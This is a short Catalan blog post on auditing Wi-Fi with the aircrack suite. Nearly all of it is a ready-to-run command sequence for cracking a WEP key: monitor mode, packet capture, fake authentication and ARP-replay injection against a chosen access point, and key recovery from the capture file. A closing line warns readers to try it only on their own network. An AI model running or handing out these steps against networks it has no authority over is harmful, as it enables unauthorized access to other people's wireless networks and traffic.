Auditories Wifi amb aircrack

La forma més ràpida de aconsseguir paquets per poder desxifrar el codi wep, es injectar paquets amb el aireplay

sudo airmon-ng start wlan0     (activa la tarja en mode monitor)

iwconfig    (per saber els dispositius)
ifconfig      (per saber les mac)

sudo airodump-ng mon0     (mira que troba)
sudo airodump-ng -c canal – -bssid macap -w datos mon0    (captura del canal i el ap que t’interessa i ho graba a un fitxer anomenat datos)
sudo aireplay-ng -1 0 -e essid -a macap -h lamevamac mon0  (es conecta al AP)
sudo aireplay-ng -3 -b macap -h lamevamac mon0 -x 300    (injecta paquets al AP)
sudo aircrack-ng datos*.cap     (busca el codi al fitxer grabat)

canal – canal
macap – Mac AP
essid – nom del ap
-h – la meva mac

-b – Mac AP

Recordo que tot això només pots ferho amb la teva pròpia xarxa per mirar el nivell de seguretat… NO ES POT FER A LA DELS VEINS !!!

Salut !!!

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *